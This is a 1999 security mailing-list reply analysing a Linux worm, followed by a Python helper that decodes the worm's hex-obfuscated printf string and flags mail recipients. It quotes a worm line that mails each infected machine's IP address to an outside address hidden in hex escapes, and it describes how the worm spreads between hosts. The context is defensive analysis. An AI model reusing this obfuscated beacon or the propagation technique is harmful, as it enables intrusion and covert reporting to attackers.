Re: MW

From: Adam Morrison (adamat_private)
Date: Tue Sep 07 1999 - 08:23:25 PDT


> On Wed, 1 Sep 1999, Christian Koderer wrote:
> > ./IP | mail `printf
> > "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
> > logout
> > _EOF_
>
>
> In case no one bothered figuring this one out, this translates to
> 'beurpat_private'
>
> Apparently './IP' is a program it runs to figure out which IP it should
> get the worm files from. Did you find a similarly named file?

It's a worm; it gets the worm files from the last infected machine.
`IP' returns the address of the machine that the copy of the worm
is running on, and is used in the `cmd' grappling hook which
apparently gets executed on compromised remote hosts.  Each time the
worm infects a machine, it mails the IP address of that machine to
<beurpat_private>.

Now, not to make any unfounded allegations, but this worm looks
remarkably like ADMw0rm.  I wonder why it restarts named when first
infecting a host, when it appears to also utilize several other
vulnerabilities in order to get in.  Ho, hum.

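A small triage helper for the obfuscated `printf` string quoted above, added here as an example and not code from the original thread or the worm: it decodes the hex escapes that hide the mail recipient and flags any decoded value that looks like an e-mail address. `SAMPLE_SCRIPT` is the quoted fragment reproduced as constructed input; the function and variable names are my own.

```python
import re

# Constructed sample: the grappling-hook fragment quoted in the thread,
# with the printf hex escapes exactly as they appear in the post.
SAMPLE_SCRIPT = r'''
./IP | mail `printf
"\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
logout
'''

# \xHH hex escapes, \NNN octal escapes, and a few common simple escapes.
_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\([\\"nt])')
_SIMPLE = {'\\': '\\', '"': '"', 'n': '\n', 't': '\t'}

def decode_printf_escapes(fmt: str) -> str:
    """Decode the escape sequences a shell printf format string can carry."""
    def repl(m):
        hexd, octd, simple = m.groups()
        if hexd is not None:
            return chr(int(hexd, 16))
        if octd is not None:
            return chr(int(octd, 8))
        return _SIMPLE[simple]
    return _ESCAPE.sub(repl, fmt)

# A printf call whose argument is a double-quoted string; re.S lets the
# string start on the line after `printf`, as in the quoted fragment.
_PRINTF_CALL = re.compile(r'printf\s*"((?:[^"\\]|\\.)*)"', re.S)
_EMAIL = re.compile(r'^[^@\s]+@[^@\s]+\.[^@\s]+$')

def find_obfuscated_printf_strings(script: str):
    """Return (raw, decoded, looks_like_email) for each printf string built
    entirely from escapes, i.e. deliberately unreadable in the source."""
    hits = []
    for m in _PRINTF_CALL.finditer(script):
        raw = m.group(1)
        if not re.fullmatch(r'(\\x[0-9A-Fa-f]{1,2}|\\[0-7]{1,3})+', raw):
            continue  # readable literal, not obfuscated
        decoded = decode_printf_escapes(raw)
        hits.append((raw, decoded, bool(_EMAIL.match(decoded))))
    return hits

if __name__ == '__main__':
    for raw, decoded, is_mail in find_obfuscated_printf_strings(SAMPLE_SCRIPT):
        kind = 'mail recipient' if is_mail else 'string'
        print(f'{kind}: {decoded!r}  (from {raw[:24]}...)')
```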